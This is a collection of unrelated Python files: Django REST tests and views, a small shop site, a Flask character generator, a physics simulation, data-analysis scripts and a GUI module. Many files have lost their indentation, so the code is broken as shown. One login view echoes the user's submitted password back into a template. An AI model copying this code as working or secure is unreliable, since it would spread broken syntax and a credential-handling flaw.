def test_create_tag_invalid_name_failure(self):
"""Test creating a tag with invalid payload"""
# Given
payload = {'name': ''}
# When
response = self.client.post(TAGS_URL, payload)
# Then
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned to recipes"""
# Given
tag1 = Tag.objects.create(user=self.user, name='Breakfast')
tag2 = Tag.objects.create(user=self.user, name='Lunch')
recipe = Recipe.objects.create(
title='Eggs Benedict',
time_minutes=10,
price=4.00,
user=self.user
)
recipe.tags.add(tag1)
# When
response = self.client.get(TAGS_URL, {'assigned_only': 1})
# Then
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1.data, response.data)
self.assertNotIn(serializer2.data, response.data)
def test_retrieve_tags_assigned_unique(self):
"""Test filtering tags by assigned returns unique items"""
# Given
tag = Tag.objects.create(user=self.user, name='Breakfast')
Tag.objects.create(user=self.user, name='Lunch')
recipe1 = Recipe.objects.create(
title='Drop scones',
time_minutes=15,
price=2.50,
user=self.user
)
recipe1.tags.add(tag)
recipe2 = Recipe.objects.create(
title='Porridge',
time_minutes=5,
price=1.50,
user=self.user
)
recipe2.tags.add(tag)
# When
response = self.client.get(TAGS_URL, {'assigned_only': 1})
# Then
self.assertEqual(len(response.data), 1)
|
"""
Question 67 :
Write a program using generator to print the numbers which can be
divisible by 5 and 7 between 0 and n in comma separated form while
n is console input.
Example : If the following n is input to the program : 100
Then, the output of the program should be : 0, 35, 70
Hints : Use yield to produce the next values in generator
In case of input being supplied to the question, it should be
assumed to be a console input.
"""
# Solution :
def num_div(n):
for i in range(n + 1):
if i%5 == 0 and i%7 == 0:
yield i
n = int(input("Enter a number : "))
values = []
for i in num_div(n):
values.append(str(i))
print(",".join(values))
"""
Output :
Enter a number : 100
0,35,70
""" |
import pybullet as p
import time
import math
import numpy as np
import random
p.connect(p.GUI)
p.loadURDF("plane.urdf",[0,0,-.2],globalScaling=6.0,useFixedBase=True)
cylId = p.loadURDF("simple_cylinder.urdf",[0,0,0.2],globalScaling=6.0,useFixedBase=False)
cubeId = p.loadURDF("cube.urdf",[2,2,0],globalScaling=0.6,useFixedBase=False)
t = 0
g = False
def eachIter():
p.setGravity(0,0,-10)
p.stepSimulation()
time.sleep(.002)
def increment(tup, ix, val):
temp = list(tup)
temp[ix] += val
return tuple(temp)
def applyAction(angle,offset):
cylPos, cylOrn = p.getBasePositionAndOrientation(cylId)
cubePos, cubeOrn = p.getBasePositionAndOrientation(cubeId)
cubeNewPos = [cylPos[0] + math.cos(math.radians(angle)),cylPos[1] + math.sin(math.radians(angle)),0]
vec = np.array([cylPos[0]-cubeNewPos[0],cylPos[1]-cubeNewPos[1],0])
vec = vec / np.linalg.norm(vec)
look = [0,0,math.atan(vec[0]/(-vec[1]))]
cubeNewPosWithOffset = cubeNewPos
cubeNewPosWithOffset[0] -= offset*math.sin(math.radians(angle))
cubeNewPosWithOffset[1] += offset*math.cos(math.radians(angle))
p.resetBasePositionAndOrientation(cubeId,cubeNewPosWithOffset,p.getQuaternionFromEuler(look))
for i in range(100):
eachIter()
for i in range(100):
p.applyExternalForce(cubeId, -1, 20*np.array(vec), cubeNewPos, flags = p.WORLD_FRAME)
eachIter()
for i in range(400):
eachIter()
cubePos, cubeOrn = p.getBasePositionAndOrientation(cubeId)
    print(np.array(list(cubePos)) - cubeNewPosWithOffset)
actions = [(10,100),(190,100)]
while (1):
# a = [int(x) for x in raw_input().split()]
for i in range(1000):
angle = random.randint(0,360)
offset = random.uniform(-0.3, 0.3)
        print(angle, offset)
applyAction(angle, offset)
# applyAction(*a)
eachIter()
t+=1
|
#!/usr/bin/env python3
import asyncio
import time
import ipaddress
import random
import prime
def measure_time(func):
    """Wrap a coroutine so that awaiting it returns a (result, duration_in_seconds) tuple."""
    async def wrapper(*params):
        start = time.monotonic()
        res = await func(*params)
end = time.monotonic()
duration = float(end - start)
return (res, duration)
return wrapper
@measure_time
async def ping(ip):
    await asyncio.sleep(random.randint(1, 10))
# res = await prime.calc_primes(random.randint(5, 22222))
return False
async def print_ping(ip):
responding, duration = await ping(ip)
print("IP: %s - %s [%f]" % (ip, responding, duration))
def main(ip_range):
global loop
loop = asyncio.get_event_loop()
res = []
tasks = []
for ip in ip_range:
ip_addr = ipaddress.ip_address(ip)
tasks.append(asyncio.ensure_future(print_ping(ip)))
loop.run_until_complete(asyncio.gather(*tasks))
loop.close()
if __name__ == '__main__':
main(range(0, 100000))
# loop.run_until_complete(main(loop, range(0, 10000)))
|
#UTF-8
def stoper(x_object, y_object, side, stop_kords=False):
    """Return False if the object's collision box (offsets depend on the facing side 0-3)
    overlaps any blocker rectangle in stop_kords (strings of the form 'x1 y1 x2 y2'), else True."""
    if stop_kords != False:
stop = True
if side == 0:
for i in stop_kords:
temp = i.split(' ')
x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 48 >= x1 and x_object + 2 <= x2 and y_object + 52 >= y1 and y_object + 28 <= y2:
stop = False
if side == 1:
for i in stop_kords:
temp = i.split(' ')
x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 48 >= x1 and x_object + 2 <= x2 and y_object + 38 >= y1 and y_object + 24 <= y2:
stop = False
if side == 2:
for i in stop_kords:
temp = i.split(' ')
x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 50 >= x1 and x_object + 40 <= x2 and y_object + 38 >= y1 and y_object + 28 <= y2:
stop = False
if side == 3:
for i in stop_kords:
temp = i.split(' ')
x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 45 >= x1 and x_object <= x2 and y_object + 38 >= y1 and y_object + 28 <= y2:
stop = False
return stop
else: return True
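# Minimal usage sketch (a sketch only; the coordinates and blocker rectangles are placeholders):
if __name__ == '__main__':
    blockers = ['100 100 200 200', '300 50 360 120']
    print(stoper(x_object=120, y_object=90, side=0, stop_kords=blockers))   # False: box overlaps the first blocker
    print(stoper(x_object=500, y_object=500, side=0, stop_kords=blockers))  # True: no overlap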
|
from gmt import app, db
from flask import render_template, url_for, request, flash
import gmt
from gmt.models import Forename, Clan, Family, School, Samurai
from sqlalchemy.sql.expression import func
import random
@app.route('/')
@app.route('/home')
@app.route('/index')
def index():
return render_template("index.html")
@app.route('/help')
def help():
return render_template("help.html")
@app.route('/generator', methods=['GET', 'POST'])
def generator():
clan = Clan.query.all()
family = Family.query.all()
school = School.query.all()
forename = Forename.query.all()
dummy = {'dclan': int(request.form.get('clan') or -1),
'dfamily': int(request.form.get('family') or -1),
'dschool': int(request.form.get('school') or -1),
'dgender': (request.form.get('gender') or -1),
'dforename': int(request.form.get('forename') or -1),
'dhonor': int(request.form.get('honor') or -1),
'dglory': int(request.form.get('glory') or -1),
'dstatus': int(request.form.get('status') or -1),
'dtaint': int(request.form.get('taint') or -1)}
if request.method == 'POST':
if request.form.get('generate') == 'Generate':
if dummy['dclan'] == -1:
print "change"
dummy['dclan'] = Clan.query.order_by(func.random()).first().id
family = Family.query.filter(Family.clan_id==dummy['dclan'])
if dummy['dfamily'] == -1 and family.all():
dummy['dfamily'] = family.order_by(func.random()).first().id
school = School.query.filter(School.clan_id==dummy['dclan'])
if dummy['dschool'] == -1 and school.all():
dummy['dschool'] = school.order_by(func.random()).first().id
if dummy['dgender'] == -1:
dummy['dgender'] = random.choice(['Male', 'Female'])
forename = Forename.query.filter(Forename.gender==dummy['dgender'])
if dummy['dforename'] == -1 and forename.all():
dummy['dforename'] = forename.order_by(func.random()).first().id
if dummy['dhonor'] == -1:
dummy['dhonor'] = int(random.gammavariate(8.0, 4.5)) % 100
if dummy['dglory'] == -1:
dummy['dglory'] = int(random.gammavariate(8.0, 3.0)) % 100
if dummy['dstatus'] == -1:
dummy['dstatus'] = int(random.gammavariate(3.5, 6.0)) % 100
if dummy['dtaint'] == -1:
dummy['dtaint'] = int(random.gammavariate(1.0, 0.5)) % 100
if request.form.get('reset') == 'Reset':
dummy['dclan'] = -1
dummy['dfamily'] = -1
dummy['dschool'] = -1
dummy['dgender'] = -1
dummy['dforename'] = -1
dummy['dhonor'] = -1
dummy['dglory'] = -1
dummy['dstatus'] = -1
dummy['dtaint'] = -1
if request.form.get('save') == 'Save':
success = True
            if any(v == -1 for v in dummy.values()):
flash("Choose everything manually or use 'Generate'!", "error")
success = False
family = Family.query.filter(Family.clan_id==dummy['dclan'])
if all(v.id != dummy['dfamily'] for v in family.all()):
flash("Family or Clan does not fit!", "error")
                success = False
school = School.query.filter(School.clan_id==dummy['dclan'])
if all(v.id != dummy['dschool'] for v in school.all()):
flash("School or Clan does not fit!", "error")
success = False
forename = Forename.query.filter(Forename.gender==dummy['dgender'])
if all(v.id != dummy['dforename'] for v in forename.all()):
flash("Gender or Name does not fit!", "error")
success = False
if success:
flash("Everything is fine!", "success")
samurai = Samurai(dummy['dgender'], dummy['dhonor'], dummy['dglory'],\
dummy['dstatus'], dummy['dtaint'], dummy['dclan'],\
dummy['dfamily'], dummy['dschool'], dummy['dforename'])
db.session.add(samurai)
db.session.commit()
return render_template("generator.html", \
clans=clan, families=family, schools=school, forenames=forename, **dummy)
@app.route('/manager', methods=['GET', 'POST'])
def manager():
samurai = Samurai.query.all()
dsamurai = int(request.form.get('samurai') or -1)
marked_samurai = Samurai.query.filter(Samurai.id==dsamurai).first()
display = False
edit = False
if request.method == 'POST':
if request.form.get('edit') == 'Edit':
if marked_samurai:
display = True
edit = True
elif request.form.get('edit') == 'Save':
if marked_samurai:
display = True
marked_samurai.notes = request.form.get('notes')
marked_samurai.honor = int(float(request.form.get('honor')) * 10)
marked_samurai.glory = int(float(request.form.get('glory')) * 10)
marked_samurai.status = int(float(request.form.get('status')) * 10)
marked_samurai.taint = int(float(request.form.get('taint')) * 10)
db.session.add(marked_samurai)
db.session.commit()
if request.form.get('load') == 'Load':
if marked_samurai:
display = True
if request.form.get('delete') == 'Delete':
if marked_samurai:
db.session.delete(marked_samurai)
db.session.commit()
samurai = Samurai.query.all()
return render_template("manager.html", display=display, edit=edit, \
dsamurai=dsamurai, marked_samurai=marked_samurai, samurais=samurai)
|
import os, logging
from rest_framework import generics
from rest_framework.permissions import AllowAny
from django.views.generic import View
from django.http import HttpResponse
from django.conf import settings
from .models import SimpleCV
from .serializers import SimpleCVSerializer
# Create your views here.
logger = logging.getLogger("")
class ListCVs(generics.ListAPIView):
queryset = SimpleCV.objects.all()
serializer_class = SimpleCVSerializer
permission_classes = (AllowAny,)
class CVbyRegionText(generics.ListAPIView):
serializer_class = SimpleCVSerializer
permission_classes = (AllowAny,)
def get_queryset(self):
"""
        Optionally restricts the returned CVs by filtering against the text and regionId URL parameters.
"""
queryset = SimpleCV.objects.all()
#logger.debug(self.request.query_params.values())
# text = self.request.query_params.get('text', None)
# regionId = self.request.query_params.get('regionId', None)
text = self.kwargs.get('text', None)
regionId = self.kwargs.get('regionId', None)
logger.debug(text)
logger.debug(type(text))
logger.debug(regionId)
if text and text != '-':
queryset = queryset.filter(jobTitle__icontains=text)
if regionId:
queryset = queryset.filter(regionId=regionId)
return queryset
class FrontendAppView(View):
"""
Serves the compiled frontend entry point
"""
def get(self, request):
try:
with open(os.path.join(settings.REACT_APP_DIR, 'build', 'index.html')) as f:
return HttpResponse(f.read())
except Exception as exc:
            logging.exception('Error occurred: %s' % repr(exc))
return HttpResponse(
"""
This URL is only used when you have built the production
version of the app. Visit http://localhost:3000/ instead, or
run `yarn run build` to test the production version.
""",
status=501,
) |
from django.shortcuts import render, get_object_or_404
from .models import Kategor, Tovar, Tovar_inphoto, Tovar_img
from django.views.generic.edit import FormView
from django.contrib.auth.forms import UserCreationForm
from django.http import JsonResponse
from django.utils.http import is_safe_url
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import REDIRECT_FIELD_NAME, login as auth_login, logout as auth_logout
from django.utils.decorators import method_decorator
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
from django.views.generic import FormView, RedirectView
from django.http import HttpResponseRedirect
from django.views.generic.base import View
from django.contrib.auth import logout
from django.http import HttpResponse
from django.shortcuts import render_to_response
from cart.forms import CartAddProductForm
from .forms import TovarForm
from .forms import ContactForm
from django.core.mail import send_mail,BadHeaderError
def index(request):
return render(request, 'shop/index.html', {})
def info(request):
return render(request, 'shop/info_gl_str.html', {})
def log1(request):
return render(request, 'shop/login_menu.html', {})
def login(request):
if request.method == 'POST':
        email = request.POST.get("email")
        password = request.POST.get("passwd")
return render(request, 'shop/login.html', {'email': email, 'password': password})
class RegisterFormView(FormView):
form_class = UserCreationForm
    # URL the user will be redirected to after successful registration.
    # In this case it points to the login page for registered users.
success_url = "/log1/"
    # Template used when rendering this view.
template_name = "shop/login_menu.html"
def form_valid(self, form):
        # Create the user if the form data was entered correctly.
form.save()
        # Call the base class method
return super(RegisterFormView, self).form_valid(form)
# Function for setting the session key.
# Django uses it to determine whether the user has logged in.
class LoginView(FormView):
"""
Provides the ability to login as a user with a username and password
"""
success_url = '/'
form_class = AuthenticationForm
redirect_field_name = REDIRECT_FIELD_NAME
template_name = "shop/login.html"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.request = None
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
# Sets a test cookie to make sure the user has cookies enabled
request.session.set_test_cookie()
return super(LoginView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
auth_login(self.request, form.get_user())
# If the test cookie worked, go ahead and
# delete it since its no longer needed
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return super(LoginView, self).form_valid(form)
class LogoutView(View):
def get(self, request):
        # Log out the user who requested this view.
logout(request)
        # Then redirect the user to the home page.
return HttpResponseRedirect("/")
def ProductList(request, category_slug=None):
category = None
categories = Kategor.objects.all()
products = Tovar.objects.filter(tovar_available=True)
if category_slug:
category = get_object_or_404(Kategor, kategory_slug=category_slug)
products = products.filter(kategory_id=category)
if 'phone_name' in request.GET:
products = products.filter(tovar_name__icontains=request.GET['phone_name'])
checki = request.GET.get('checki', False)
    # Collect the 25 filter checkboxes (check0 .. check24) in order
    z = [request.GET.get('check{}'.format(i), False) for i in range(25)]
    if checki:
        try:
a0 = Tovar_inphoto.objects.filter(tovarinphoto_proizv__in=[z[0], z[1], z[2], z[6]])
list_a0 = []
for i in a0.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a0.append(i)
a1 = Tovar_inphoto.objects.filter(tovarinphoto_diagon__in=[z[3], z[4], z[5]])
list_a1 = []
for i in a1.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a1.append(i)
a2 = Tovar_inphoto.objects.filter(tovarinphoto_ram__in=[z[7], z[8], z[9], z[10]])
list_a2 = []
for i in a2.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a2.append(i)
a3 = Tovar_inphoto.objects.filter(
tovarinphoto_osnkamera__in=[z[11], z[12], z[13], z[14], z[15], z[16], z[17]])
list_a3 = []
for i in a3.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a3.append(i)
a4 = Tovar_inphoto.objects.filter(tovarinphoto_opsystem__in=[z[18], z[19], z[20]])
list_a4 = []
for i in a4.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a4.append(i)
a5 = Tovar_inphoto.objects.filter(tovarinphoto_cpu__in=[z[21], z[22], z[23], z[24]])
list_a5 = []
for i in a5.values_list('tovarinphoto_proizv', flat=True).order_by('tovarinphoto_proizv'):
list_a5.append(i)
list_all_p = []
list_all_proizv = [list_a0, list_a1, list_a2, list_a3, list_a4, list_a5]
for i in list_all_proizv:
if len(i) != 0:
list_all_p.append(set(i))
else:
pass
iter_a = list_all_p[0]
for i in list_all_p:
iter_a &= i
iter_a = list(iter_a)
list_tovar = []
for i in Tovar_inphoto.objects.filter(tovarinphoto_proizv__in=iter_a):
list_tovar.append(i.tovar_id.tovar_name)
products = Tovar.objects.filter(tovar_name__in=list_tovar)
except IndexError:
pass
return render(request, 'shop/smartfons.html', {
'category': category,
'categories': categories,
'products': products
})
def get_category_list(max_results=0, starts_with=''):
cat_list = []
if starts_with:
cat_list = Tovar.objects.filter(tovar_name__icontains=starts_with)
if max_results > 0:
if len(cat_list) > max_results:
cat_list = cat_list[:max_results]
return cat_list
def suggest_category(request):
cat_list = []
starts_with = ''
if request.method == 'GET':
starts_with = request.GET['suggestion']
cat_list = get_category_list(8, starts_with)
return render(request, 'shop/category_list.html', {'cat_list': cat_list})
# Product page view
def ProductDetail(request, id, slug):
product = get_object_or_404(Tovar, id=id, tovar_slug=slug, tovar_available=True)
har = Tovar_inphoto.objects.get(id=id)
fot = har.phototovar.all()[0]
cart_product_form = CartAddProductForm()
return render(request, 'shop/harakteriskick.html', {'product': product, 'har': har,
'cart_product_form': cart_product_form,
'fot': fot})
# def ProductDetail(request, id, slug):
# product = get_object_or_404(Tovar, id=id, tovar_slug=slug, tovar_available=True)
# har = Tovar_inphoto.objects.get(id=id)
# cart_product_form = CartAddProductForm()
# if request.method == "GET":
# form = TovarForm(request.GET.get("phone_name", None))
# print(request.GET['phone_name'])
# if form:
# product = Tovar_inphoto.objects.filter(tovarinphoto_info__icontains=form)
# return render(request, 'shop/harakteriskick.html', {'product': product, 'har': har,
# 'cart_product_form': cart_product_form,
# 'form': form})
# else:
# form = TovarForm()
# return render(request, 'shop/harakteriskick.html', {'product': product, 'har': har,
# 'cart_product_form': cart_product_form,
# 'form': form})
# def ProductDetail(request, id, slug):
# product = get_object_or_404(Tovar, id=id, slug=slug, available=True)
# cart_product_form = CartAddProductForm()
# return render_to_response('shop/product/detail.html',
# {'product': product,
# 'cart_product_form': cart_product_form})
# Contact form view
def contactform(request):
    if request.method == 'POST':
        form = ContactForm(request.POST)
        # If the form was filled in correctly, save all the values entered by the user
        if form.is_valid():
            subject = form.cleaned_data['subject']
            sender = form.cleaned_data['sender']
            message = form.cleaned_data['message']
            copy = form.cleaned_data['copy']
            recepients = ['leva2048@mail.ru']
            # If the user wants to receive a copy, add them to the list of recipients
            if copy:
                recepients.append(sender)
            try:
                send_mail(subject, message, 'leva2048@mail.ru', recepients)
            except BadHeaderError:  # Guard against header injection
                return HttpResponse('Invalid header found')
            # Redirect to another page once the message has been sent
            return HttpResponseRedirect('/thanks/')
    else:
        form = ContactForm()
    # Render the form in the template
    return render(request, 'contact.html', {'form': form})
def thanks(request):
    thanks = 'thanks'
    return render(request, 'thanks.html', {'thanks': thanks})
|
#
# Copyright (c) 2020 Expert System Iberia
#
"""Implements a factcheckability reviewer based on the ClaimBuster API
"""
def review(item, config):
"""Reviews the incoming item and returns
:param item: a single item or a list of items, in this case the
items must be `Sentence` instances.
:param config: a configuration map
:returns: one or more Review objects for the input items
:rtype: dict or list of dict
"""
    raise NotImplementedError()
|
#!/usr/bin/env spcli
from seqpy import cout, cerr, cexit
from seqpy.cmds import arg_parser
from seqpy.core.bioio import grpparser
from itertools import cycle, combinations
try:
    from matplotlib import pyplot as plt
    import allel
except ImportError:
cexit('ERR: require properly installed matplotlib and scikit-allel')
import numpy as np
def init_argparser():
p = arg_parser("Create PCoA plot based on distance matrix file")
p = grpparser.init_argparser(p)
p.add_argument('--dpi', type=int, default=600)
p.add_argument('--dotsize', type=float, default=0.25)
p.add_argument('-o', '--outfile', default="outplot.pcoa.png")
p.add_argument('infile')
return p
def main( args ):
pcoa( args )
def pcoa( args ):
cerr('I: reading group info')
group_parser = grpparser.GroupParser( args )
group_parser.parse()
with open(args.infile, 'rb') as infile:
cerr('I: reading sample header...')
samples = next(infile).decode('UTF-8').strip().split()
groups = group_parser.assign_groups(samples)
cerr('I: reading distance matrix')
distm = np.loadtxt(infile, delimiter='\t')
pcoa = allel.pcoa(distm)
fig = plt.figure( figsize = (27, 9), dpi = args.dpi )
fig_idx = 1
colour_list = group_parser.colour_list()
for pcx, pcy in combinations([0,1,2], 2):
ax = fig.add_subplot(1, 3, fig_idx)
fig_idx += 1
make_plot(ax, pcoa[0][:,pcx], pcoa[0][:,pcy], colour_list, args.dotsize)
fig.tight_layout()
fig.savefig(args.outfile)
def make_plot(axis, x, y, colours, dotsize):
axis.scatter( x, y, dotsize, c=colours )
|
"""
Another hexastore implementation.
An implementation of "Sextuple Indexing for Semantic Web Data Management"
by C. Weiss et al. This is an implementation for fun only; it may
be used if really needed, but something more serious is advised otherwise.
Example
-------
import hexastore
store = hexastore.Hexastore()
store.insert(["hexastores", "are", "awesome"])
store.insert(["cats", "are", "awesome"])
result = store.search(subject="cats");
"""
from hexastore import version
from hexastore import hexastore
Hexastore = hexastore.Hexastore
__author__ = "Eric Matti"
__version__ = version.__version__
__all__ = ["Hexastore"]
|
"""
This module defines the sources of data used in the predictive analysis library.
User applications should import the factory method `get_data_source` in order to
instantiate the classes defined in this module.
"""
import numpy as np
from typing import List
from year_ap_predictive.library_types import SampleDataPoint
from data_sources.analytics_platform_data_source import AnalyticsPlatformDataSource
# disable numpy warnings
np.warnings.filterwarnings('ignore')
# Helper functions
def project_column(rows, column_index):
return [row[column_index] for row in rows]
def to_float64_np_array(rows):
return np.asarray(rows, dtype=np.float64)
def get_log10_column(raw, column_index: int):
return np.log10(to_float64_np_array(project_column(raw, column_index)))
def check_all_log_values_are_valid(feature_vector: List[float], value_vector: List[float]) -> bool:
return not np.any(np.isneginf(np.concatenate((feature_vector, value_vector))))
# Data Sources
class EarlyToLatePopularityDataSource(AnalyticsPlatformDataSource):
"""
Source of data for Szabo and Huberman's Linear Log Model on prediction of late video popularity.
    Due to the log transformation required by this algorithm, samples with a
    popularity count equal to zero are rejected by this data source.
"""
popularity_at_age_sql = """
SELECT
COALESCE(SUM(svm."ViewCount"), 0.0)
FROM
"SourceVideos" AS sv
LEFT JOIN
"SourceVideoMetrics" AS svm on sv."Id" = svm."VideoId"
WHERE
sv."Id" = %s
AND svm."EventDate" < sv."PublishedAt" + INTERVAL '%s days'
AND svm."EventDate" >= sv."PublishedAt"
"""
total_view_count_column_index = 0
def __init__(self, early_age: int, late_age: int, config_file: str) -> None:
"""
Keyword arguments:
early_age -- number of days that define early popularity
late_age -- number of days that define late popularity
"""
super().__init__(config_file)
self.set_params(early_age, late_age)
def set_params(self, early_age: int, late_age: int):
self.early_age = early_age
self.late_age = late_age
def list_sample_ids(self):
"""
list of source video ids
"""
cmd = """
SELECT
"Id"
FROM
"SourceVideos"
"""
raw = self.simple_execute(cmd)
return [str(r[0]) for r in raw]
def get_feature_vector(self, sample_id):
"""
The only component is the early popularity count
"""
raw = self.simple_execute(self.popularity_at_age_sql, (sample_id, self.early_age))
return get_log10_column(raw, self.total_view_count_column_index)
def get_value_vector(self, sample_id):
"""
The only component is the late popularity count
"""
raw = self.simple_execute(self.popularity_at_age_sql, (sample_id, self.late_age))
return get_log10_column(raw, self.total_view_count_column_index)
def get_class_of_sample(self, sample_id):
"""
The platform of the source video
"""
cmd = """
SELECT
"Platform"
FROM
"SourceVideos"
WHERE
"Id" = %s
"""
raw = self.simple_execute(cmd, (sample_id,))
return raw[0][0]
def should_consider_sample_id(self, dataPoint: SampleDataPoint):
"""
        Rejects samples with 0's in any entry of either the feature or the value vector.
        Why? This data source takes the log of the view count at the k-th
        day. The logarithm of 0 is not defined and thus these entries must be
        removed.
        From a business point of view, it can be argued that no prediction
        can be made about a video that has not yet been watched.
"""
return check_all_log_values_are_valid(dataPoint.feature, dataPoint.value)
class MetaTagAwareEarlyToLatePopularityDataSource(EarlyToLatePopularityDataSource):
def __init__(self, early_age: int, late_age: int, config_file: str, tag_types: List[str]) -> None:
super().__init__(early_age, late_age, config_file)
self.tag_types = tag_types
def get_class_of_sample(self, sample_id):
"""
        The platform of the source video combined with its meta tags
"""
cmd = """
SELECT
sv."Platform",
amt."Tag"
FROM
"SourceVideos" AS sv
JOIN
"ApplicationVideoSourceVideos" AS avsv ON sv."Id" = avsv."SourceVideoId"
JOIN
"ApplicationVideos" AS av ON avsv."ApplicationVideoId" = av."Id"
JOIN
"ApplicationVideoApplicationMetaTags" AS avamt ON av."Id" = avamt."VideoId"
JOIN
"ApplicationMetaTagsTypes" AS amtt ON amtt."Id" = avamt."TypeId"
JOIN
"ApplicationMetaTags" AS amt ON amt."Id" = avamt."TagId"
WHERE
sv."Id" = %s
AND
amtt."Type" IN %s
"""
raw = self.simple_execute(cmd, (sample_id, self.tag_types))
groups = [raw[0][0]] + [row[1] for row in raw]
return "-".join(groups)
class MetaTagExclusiveEarlyToLatePopularityDataSource(EarlyToLatePopularityDataSource):
def __init__(self, early_age: int, late_age: int, config_file: str, tag_types: List[str]) -> None:
super().__init__(early_age, late_age, config_file)
self.tag_types = tag_types
def get_class_of_sample(self, sample_id):
"""
        The meta tags of the source video (platform excluded)
"""
cmd = """
SELECT
amt."Tag"
FROM
"SourceVideos" AS sv
JOIN
"ApplicationVideoSourceVideos" AS avsv ON sv."Id" = avsv."SourceVideoId"
JOIN
"ApplicationVideos" AS av ON avsv."ApplicationVideoId" = av."Id"
JOIN
"ApplicationVideoApplicationMetaTags" AS avamt ON av."Id" = avamt."VideoId"
JOIN
"ApplicationMetaTagsTypes" AS amtt ON amtt."Id" = avamt."TypeId"
JOIN
"ApplicationMetaTags" AS amt ON amt."Id" = avamt."TagId"
WHERE
sv."Id" = %s
AND
amtt."Type" IN %s
"""
raw = self.simple_execute(cmd, (sample_id, self.tag_types))
groups = [row[0] for row in raw]
return "-".join(groups)
|
"""This builds a GUI which can
a) load and show IMU data
b) apply an algorithm for stride segmentation and event detection
c) be used to manually add/delete/adapt labels for strides and/or activities.
isort:skip_file (Required import order: PySide2, pyqtgraph, mad_gui.*)
"""
import os
import sys
import warnings
from pathlib import Path
import platform
import ctypes
import pickle
from typing import Dict, Tuple
import pandas as pd
import pyqtgraph as pg
from PySide2.QtCore import Qt
from PySide2.QtUiTools import loadUiType
from PySide2.QtWidgets import (
QFileDialog,
QMessageBox,
QVBoxLayout,
QMainWindow,
QApplication,
)
from PySide2.QtGui import QPalette
from mad_gui.components.dialogs.data_selector import DataSelector
from mad_gui.components.dialogs.plugin_selection.load_data_dialog import LoadDataDialog
from mad_gui.components.dialogs.plugin_selection.plugin_selection_dialog import PluginSelectionDialog
from mad_gui.components.dialogs.user_information import UserInformation
from mad_gui.components.helper import set_cursor
from mad_gui.components.key_event_handler import KeyEventHandler
from mad_gui.components.sidebar import Sidebar
from mad_gui.config import Config, BaseSettings, BaseTheme
from mad_gui.models.global_data import GlobalData
from mad_gui.models.local import PlotData
from mad_gui.models.ui_state import UiState, PlotState, MODES
from mad_gui.plot_tools.plots import SensorPlot, VideoPlot
from mad_gui.plot_tools.labels import BaseRegionLabel, BaseEventLabel
from mad_gui.plugins.base import BaseExporter, BaseImporter, BaseAlgorithm
from mad_gui.plugins.helper import filter_plugins
from mad_gui.state_keeper import StateKeeper
from mad_gui.utils.helper import resource_path
from mad_gui.windows import VideoWindow
from mad_gui.qt_designer import UI_PATH
try:
import pyi_splash # noqa
pyi_splash.close()
except ModuleNotFoundError:
# we only need to import this when we are in a .exe, see pyinstaller docs
pass
# helps to make plot zooming smooth even when line width >1
pg.setConfigOption("useOpenGL", True)
# CI can't handle openGL
if os.environ.get("GITHUB_CI"):
pg.setConfigOption("useOpenGL", False)
# Make sure that graphs are properly scaled when having multiple screens
QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)
os.environ["QT_AUTO_SCREEN_SCALE_FACTOR"] = "1"
if platform.system() == "Windows" and int(platform.release()) >= 8:
ctypes.windll.shcore.SetProcessDpiAwareness(True)
ui_path = resource_path(str(UI_PATH / "main.ui"))
if ".ui" in ui_path:
try:
Window, _ = loadUiType(ui_path)
except TypeError:
try:
uic_path = Path(os.sep.join(sys.executable.split(os.sep)[:-1])) / "Scripts"
sys.path.append(str(uic_path))
Window, _ = loadUiType(ui_path)
except TypeError as e:
raise FileNotFoundError(
"Probably python did not find `pyside2-uic`. See "
'"https://mad-gui.readthedocs.io/en/latest/troubleshooting.html#pyside2-uic-not-found" for more '
"information"
) from e
elif ".py" in ui_path:
from mad_gui.qt_designer.build.main import Ui_MainWindow as Window # noqa
class MainWindow(QMainWindow):
"""This class implements the functionalities of the buttons in the GUI.
Furthermore, it serves as an interface to Input-Output files, which are different for each data source,
see our `General Information` part of the docs, section `Adding support for other systems`."""
def __init__(
self,
parent=None,
data_dir=None,
settings=BaseSettings,
theme=BaseTheme,
plugins=None,
labels=None,
events=None,
):
super().__init__()
self.check_arguments(plugins, labels, events)
Config.set_theme(theme)
Config.set_settings(settings)
self.global_data = GlobalData(parent=self)
self.ui_state = UiState(parent=self)
self.plot_state = PlotState(parent=self)
self.global_data.labels = labels or []
self.global_data.events = events or []
self.parent = parent
# Setting up the UI
self.ui = Window()
self.ui.setupUi(self)
c = theme.COLOR_DARK
self.setStyleSheet(f"background-color: rgb({c.red()}, {c.green()}, {c.blue()});")
self.setStyleSheet(f"background-color: rgb({c.red()}, {c.green()}, {c.blue()});")
self.palette().setColor(QPalette.Active, QPalette.Window, theme.COLOR_LIGHT)
self._set_window_properties()
# Register sidebar component logic
self.menu = Sidebar(self.ui, parent=parent)
self.ui_state.bind_bidirectional(self.menu.set_collapsed, self.menu.collapsed_changed, "menu_collapsed")
self.menu.set_collapsed(False)
# Setting up additional windows
self.VideoWindow = VideoWindow(parent=self)
self.data_selector = None
# can only be done after adding the windows above
self.label_buttons = {
"add": self.ui.btn_add_label,
